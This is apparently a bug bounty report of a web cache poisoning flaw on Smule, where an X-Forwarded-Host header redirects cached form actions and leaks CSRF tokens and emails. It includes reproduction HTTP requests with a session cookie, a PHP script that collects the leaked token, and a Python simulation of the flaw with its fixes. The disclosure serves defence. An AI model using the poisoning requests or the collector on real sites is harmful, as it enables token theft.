Web cache poisoning leads to disclosure of CSRF token and sensitive information
Discovered by red_assassin on Smule

This issue took 14 Days and 18 hours to triage and 94 Days and 17 hours to resolve once triaged.



Summary:

The page https://www.smule.com/s/smule_groups/user_groups/user_name is vulnerable to web cache poisoning.

Description:

The page https://www.smule.com/s/smule_groups/user_groups/user_name is vulnerable to web cache poisoning: adding an X-Forwarded-Host header to the request changes several links in the response (the form action links and the footer links), and because the cache does not key on that header, the poisoned response is served to other users, whose browsers then make requests to a third-party website.
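The mechanism described above, as an added example that is not part of the original report or of Smule's code: a small Python simulation of a shared cache that keys responses on method, Host and path only, in front of an origin that builds its absolute links from X-Forwarded-Host. The allowlist TRUSTED_HOSTS, the page rendering, the cache class and the placeholder user name in PAGE_PATH are constructed assumptions for this example. It shows the poisoned entry being served to a later visitor who never sent the header, then the two mitigations a defender would apply, honouring X-Forwarded-Host only when it names a trusted host, or adding the header to the cache key (the effect of a Vary on it), plus a check that flags foreign hosts in a served page.

```python
import re

# Hostnames the application is legitimately served on (constructed allowlist for this example).
TRUSTED_HOSTS = {"www.smule.com"}

# Constructed stand-in for the vulnerable path in the report (user name replaced by a placeholder).
PAGE_PATH = "/s/smule_groups/user_groups/EXAMPLE_USER"


def host_from_forwarded_unsafe(headers):
    """Vulnerable origin behaviour: X-Forwarded-Host from any client overrides Host."""
    return headers.get("X-Forwarded-Host") or headers["Host"]


def host_from_forwarded_safe(headers):
    """Hardened: X-Forwarded-Host is honoured only if it names a trusted host, else Host is used."""
    fwd = headers.get("X-Forwarded-Host")
    return fwd if fwd in TRUSTED_HOSTS else headers["Host"]


def render_page(headers, host_fn):
    """Origin renders absolute links (form action, footer link) from the effective host."""
    host = host_fn(headers)
    return (f'<form action="https://{host}/user/check_email" method="POST">'
            f'<input name="email"></form>'
            f'<footer><a href="https://{host}/about">About</a></footer>')


class SharedCache:
    """Cache keyed on method, Host and path; vary_on adds further request headers to the key."""

    def __init__(self, host_fn, vary_on=()):
        self.store = {}
        self.host_fn = host_fn
        self.vary_on = tuple(vary_on)

    def key(self, method, path, headers):
        return (method, headers["Host"], path) + tuple(headers.get(h) for h in self.vary_on)

    def get(self, method, path, headers):
        k = self.key(method, path, headers)
        if k in self.store:
            return self.store[k], "HIT"
        body = render_page(headers, self.host_fn)
        self.store[k] = body
        return body, "MISS"


def linked_hosts(html):
    """Hosts referenced by href/action attributes in a served page."""
    return set(re.findall(r'(?:href|action)="https?://([^/"]+)', html))


def foreign_hosts(html):
    """Detection check: any linked host outside the allowlist indicates a poisoned response."""
    return sorted(linked_hosts(html) - TRUSTED_HOSTS)


def run_scenario(host_fn, vary_on=()):
    """One request carrying the injected header, then an ordinary visitor.

    Returns the visitor's cache status, the form action they were served,
    and any foreign hosts found in their page.
    """
    cache = SharedCache(host_fn, vary_on)
    # Constructed request mirroring the report: injected X-Forwarded-Host.
    poisoning_request = {"Host": "www.smule.com", "X-Forwarded-Host": "localhost"}
    cache.get("GET", PAGE_PATH, poisoning_request)
    # A later visitor sends no X-Forwarded-Host at all.
    visitor_request = {"Host": "www.smule.com"}
    html, status = cache.get("GET", PAGE_PATH, visitor_request)
    action = re.search(r'action="([^"]+)"', html).group(1)
    return status, action, foreign_hosts(html)


if __name__ == "__main__":
    print("vulnerable:       ", run_scenario(host_from_forwarded_unsafe))
    print("allowlisted host: ", run_scenario(host_from_forwarded_safe))
    print("header in key:    ", run_scenario(host_from_forwarded_unsafe, vary_on=("X-Forwarded-Host",)))
```

The first scenario is the report's finding: the visitor gets a cache HIT whose form action points at localhost, so their browser will submit the email and the CSRF token header there. The second removes the root cause at the origin; the third keeps the origin unchanged but makes the cache key include the header, so the visitor's request misses the poisoned entry. In practice the first fix is preferable, since keying on an attacker-controlled header also lets an attacker fill the cache with one entry per header value.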

Steps To Reproduce:

GET /s/smule_groups/user_groups/fossnow27 HTTP/1.1
Host: www.smule.com
X-Forwarded-Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: smule_id_production=████%3D%3D--a559b392c9fc10711c799307af296a387ec77794; smule_cookie_banner_disabled=true; _ga=GA1.2.1744768224.1551586925; _gid=GA1.2.2071077738.1551586925; L=N; _smule_web_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiJTY4Nzc0ZDQxYjdiYmEyYTlmNmRkZTk3NjYwYmRlMDBkBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWhmSkdDZk9XcGhHajc5dXFHd1FYc1NhUnh0eGtjVHBocG1Sb3RubldlNDg9BjsARg%3D%3D--4ea860dfb2e3ad2a5a3d49c058f35485961ac5d3; cookies.js=1; smule_autoplay={%22enabled%22:true}; py={%22globalVolume%22:true%2C%22volume%22:0.5}; connection_info=eyJjb3VudHJ5IjoiSU4iLCJob21lUG9wIjoic2ciLCJjb250ZW50UHJveHkiOiJ0YyJ9--16206c9d48aa7c70227255756cc5a9e1e43d3cab
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"74107fb6dcc410390f339e5ddabc3022"
Cache-Control: max-age=0

In the request above I have added the X-Forwarded-Host header.

  • The response returned is shown below; both the action links and the footer links of the page are changed. {F434734}

  • Now open the response and try to log in; when you do, the following request is made. If you refresh the page it will ask for resubmission, as the caching is of the revalidate type.

POST /user/check_email HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.smule.com/s/smule_groups/user_groups/fossnow27
X-CSRF-Token: █████████=
Content-Type: application/x-www-form-urlencoded
X-Smulen: daf446d26def7faeef4f6527d7f20fae
Content-Length: 31
Origin: https://www.smule.com
Connection: close

email=foo%40bar.com 

To mimic the response of the actual server, I have written the following script:

<?php
// Mock of the third-party host (the X-Forwarded-Host value) that receives the poisoned form submission.
if ($_SERVER['REQUEST_METHOD'] == "OPTIONS") {
    // Browser preflight for the cross-origin POST that carries the custom X-CSRF-Token / X-Smulen headers.
    if (($_SERVER['HTTP_ORIGIN'] ?? '') == "https://www.smule.com") {
        header('Access-Control-Allow-Origin: *');
        header('Access-Control-Allow-Methods: POST, GET, OPTIONS');
        header('Access-Control-Allow-Headers: x-csrf-token,x-smulen');
        header('Access-Control-Max-Age: 1728000');
        header("Content-Length: 0");
        header("Content-Type: text/plain");
        exit;
    } else {
        header("HTTP/1.1 403 Access Forbidden");
        header("Content-Type: text/plain");
        echo "You cannot repeat this request";
        exit;
    }
} else if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Reproduce the headers of the real /user/check_email response, then echo back what the browser sent.
    header("Content-type: application/json; charset=utf-8");
    header("Cache-Control: max-age=0, private, must-revalidate");
    header("Content-Security-Policy: default-src * data: blob:; frame-ancestors *.smule.com; script-src 'unsafe-inline' 'unsafe-eval' blob: https://boards.greenhouse.io/embed/job_board/js https://js.stripe.com/v2/ https://js.stripe.com/v3/ http://*.smule.com:* http://*.facebook.net http://*.google-analytics.com http://*.google.com http://*.googleapis.com http://*.gstatic.com https://*.smule.com:* https://*.facebook.net https://*.accountkit.com https://*.google-analytics.com https://*.google.com https://*.googleapis.com https://*.gstatic.com http://www.apple.com/library/quicktime/scripts/ac_quicktime.js https://www.apple.com/library/quicktime/scripts/ac_quicktime.js platform.twitter.com https://optimize.google.com; style-src 'unsafe-inline' data: http://*.smule.com:* https://*.smule.com:* yui.yahooapis.com https://optimize.google.com https://fonts.googleapis.com; report-uri /s/csp-log;");
    header("X-Frame-Options: SAMEORIGIN");
    header("Set-Cookie: smule_id_production=████%3D%3D--a559b392c9fc10711c799307af296a387ec77794;domain=.smule.com; path=/; expires=Fri, 01-Jan-2038 08:00:00 GMT");
    header("ETag: W/\"5be24db7cb9adabbe965c1850ce0de98\"");
    header("X-Request-Id: 9c67b0a57e77660dacbefea12085f82f");
    // The CSRF token and the submitted e-mail arrive at this host, which is the disclosure.
    $res = array(
        "email" => true,
        "token" => $_SERVER["HTTP_X_CSRF_TOKEN"] ?? null,
        "mail"  => $_POST['email'] ?? null
    );
    echo json_encode($res);
}
?>

The request/response is shown below:

{F434739}

Impact:

  • CSRF attacks.
  • Sensitive information leakage.
